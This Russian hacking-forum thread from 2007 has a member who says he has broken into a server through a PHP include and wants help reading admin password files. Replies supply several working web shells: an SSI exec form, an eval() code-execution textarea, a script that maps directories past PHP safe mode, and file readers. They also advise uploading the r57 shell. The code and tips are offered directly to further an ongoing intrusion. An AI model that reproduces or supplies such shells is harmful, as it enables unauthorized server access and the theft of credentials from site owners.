Нужен веб-шелл без использования system, passthru,exec,etc

Discussion in 'Уязвимости' started by fastnull, 30 Apr 2007.

  1. fastnull

    fastnull Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    31
    Likes Received:
    7
    Reputations:
    1
    Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
    Использовать сплойт для ядра пока что не хочу, а
    Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please!
     
    #1 fastnull, 30 Apr 2007
    Last edited: 30 Apr 2007
    1 person likes this.
  2. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    CODE
    <html>
    <body>
    <script language="JavаScript">
    <!--
    function execute() {
    var cmd = document.exec.cmd.value;
    document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>');
    }
    //-->
    </script>
    <form name="exec">
    <input type="text" name="cmd" size="20" value="">&nbsp;
    <input type="submit" value="exec" onClick="execute()">
    </form>
    </body>
    </html>
     
    1 person likes this.
  3. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Покури форум еще!! Вот на форуме давно кто-то выложил!
    <?php
    $file="";
    $tem="";
    $temp=tempnam($tem, "cx");
    if(copy("http://".$file, $temp))
    {
    $otrit = fopen($temp, "r");
    $pokaz = fread($otrit, filesize($temp));
    fclose($otrit);
    echo htmlspecialchars($pokaz);
    unlink($temp);
    }
    ?>
     
    1 person likes this.
  4. fastnull

    fastnull Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    31
    Likes Received:
    7
    Reputations:
    1
    Спасибо! Приму к сведению! А есть ещё что-нибудь навороченное, с алиасами и всё-такое?
     
  5. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Есть , но стоит денег! Поставь хоть +! :)

    Потыкай вот это еще

    Code:
    <?
    "; echo ""; echo "
    Root directory: 
    "; echo ""; echo "
    ------------------------------------
    "; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKL MNOPQRSTUVWXYZ"; for($i=0; $i ";
      foreach($D as $item) echo "{$item}\n";
      echo "
    "; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } ?>
     
    3 people like this.
  6. fastnull

    fastnull Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    31
    Likes Received:
    7
    Reputations:
    1
    Дай бог тебе здоровья, парень!
     
  7. fastnull

    fastnull Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    31
    Likes Received:
    7
    Reputations:
    1
    Слушай у меня такое подозрение, что новички с репой 0 не могут добавлять никому репутацию, но мы с тобой ещё сочтёмся, парень! ;)
     
    1 person likes this.
  8. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    PHP:
    <?php
        $gpc
    =get_magic_quotes_gpc();
        if (!empty(
    $_POST['c'])) {
            
    $c $gpc?stripslashes($_POST['c']):$_POST['c'];
        } else {
            
    $c NULL;
        }
    ?>
    <form action="" method="POST">
    <textarea cols="80" rows="30" name="c" id="c"><?php echo $c;?></textarea>
    <br />
    <input type="submit"/>
    </form>
    <?php
     
    if (!is_null($c)) eval($c);
    ?>
    =========
    Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться.
    ===========
    Вот код для просмотра текущей директории:
    PHP:
     $d dir(".");
     echo 
    "Дескриптор: ".$d->handle."<br>\n";
     echo 
    "Путь: ".$d->path."<br>\n";
     while (
    false !== ($entry $d->read())) {
        echo 
    $entry."<br>\n";
     }
     
    $d->close();
    =============
    А вот для файла:
    PHP:
     echo '<xmp>';
     
    htmlspecialchars(readfile('file.php'));
     echo 
    '</xmp>';
    -------------------------------------
    <xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>
    =================
    Есть еще шелл, не использующий system:
    http://php.spb.ru/remview/
     
    #8 SkyMan, 1 May 2007
    Last edited: 1 May 2007
    1 person likes this.
  9. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
    Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти.
     
  10. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Береги себя!!! Стучи 1-869-53два!
     
  11. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    401
    Likes Received:
    153
    Reputations:
    80
    <xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i>

    а тогда накой штмлспециалчарс???
     
  12. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Да. Ты прав. Здесь можно обойтись одним лишь htmlspecialchars. Это лишнюю работу я сделал, написав <xmp>, </xmp>.
     
  13. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    И как права поднимаешь? Извини, если вопрос не умный.
     
  14. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Да я их не поднимаю ! Это если ты похакал и права nobody(тогда на сервере можешь просматривать все диры и файлы!)!
     
  15. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Или права httpd или apache и www!!!!
     
  16. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    А. Твой скрипт стопудово будет с правами, от которых работает Apache.
    Которые могут быть nobody. Или может быть создан специальный юзверь www.
     
  17. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    да это не от скрипта зависит пойми! А от настроек сервера!
     
  18. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    SkyMan
    fly
    Пишите полный бред.

    Ты хотя бы понимаешь почему так происходит...
    Все зависит от группы.
    Как правило ты не пожешь просматривать
    а вот
    Можешь потаму что демон апача обзятельно будет смотреть поэтому ты и сможешь ее просматреть. А те юзеры котрым был создан отдельный uid те просто поставяь на эту папку свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
     
  19. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Я понимаю, что ты умный очень. Но я объяснил человеку который плохо понимает, что делает. Походу дорогу я тебе перебежал. !:) Кста он меня понял, а вот тебя врядли. Не лечи доктор.

    С nobody я просмотрю все на сервере и с apache тоже. Практика большая, хоть и не Гуру!
     
    1 person likes this.
  20. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    >> свой chmod и все будет будет работать(apache), а ты ее просмотреть не сможешь.
    Тут не спорю, но часто все нормально проходит.
     
Loading...